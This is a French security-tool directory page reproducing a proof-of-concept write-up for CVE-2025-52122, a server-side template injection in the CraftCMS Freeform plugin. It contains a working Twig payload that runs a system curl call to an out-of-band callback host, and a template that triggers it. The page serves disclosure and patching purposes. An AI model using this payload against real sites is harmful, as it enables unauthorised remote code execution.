Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-52122 — Injection de code arbitraire dans CraftCMS Freeform 5.0.0 < 5.10.16 | Kitploit
Outils/GitHubGitHub/timtrademark/cve-2025-52122
Analyse des VulnérabilitésAnalyse de CodeExploitationExploitation d'Applications WebTests d'Intrusion
GitHubtimtrademark/cve-2025-52122

CVE-2025-52122

Injection de code arbitraire dans CraftCMS Freeform 5.0.0 < 5.10.16

Voir le dépôt
1il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE CraftCMS Freeform

CraftCMS Freeform contient une vulnérabilité SSTI, entraînant une injection de code arbitraire pour tous les utilisateurs ayant accès à l'édition d'un formulaire (titre de soumission).

Les versions vulnérables sont v5.0.0 < v5.10.16.

Étapes pour reproduire

Créer un formulaire :

create a form

J'ai créé le formulaire « pentest » ici comme preuve de concept. Ensuite, dans les paramètres, définissez le titre de soumission suivant (remplacez le nom de domaine par votre propre serveur) :

root@kitploit:~
{{ 'system' | call('curl http://gwgyynafr4feu5xecukf1h2nqew5kw8l.oastify.com/rce') }}

submission title

Cela exécutera un appel système arbitraire. Dans ce cas, j'effectue un curl vers un serveur contrôlé qui me notifiera en cas de connexions entrantes. Ensuite, incluez ce formulaire dans un modèle/page et soumettez-le :

root@kitploit:~
<h1>test</h1>
{% set form = freeform.form('pentest') %}

{% if form %}
  {{ form.render() }}
{% else %}
  <p>Form not found.</p>
{% endif %}

Cela aura déclenché la commande curl. Nous pouvons le vérifier en regardant la requête HTTP entrante qui a été créée :

incoming connection

La cause première de ce problème est que Freeform implémente le filtre Twig « call » sans valider les données utilisateur. Cela a été corrigé dans le commit suivant.

Télécharger l’outil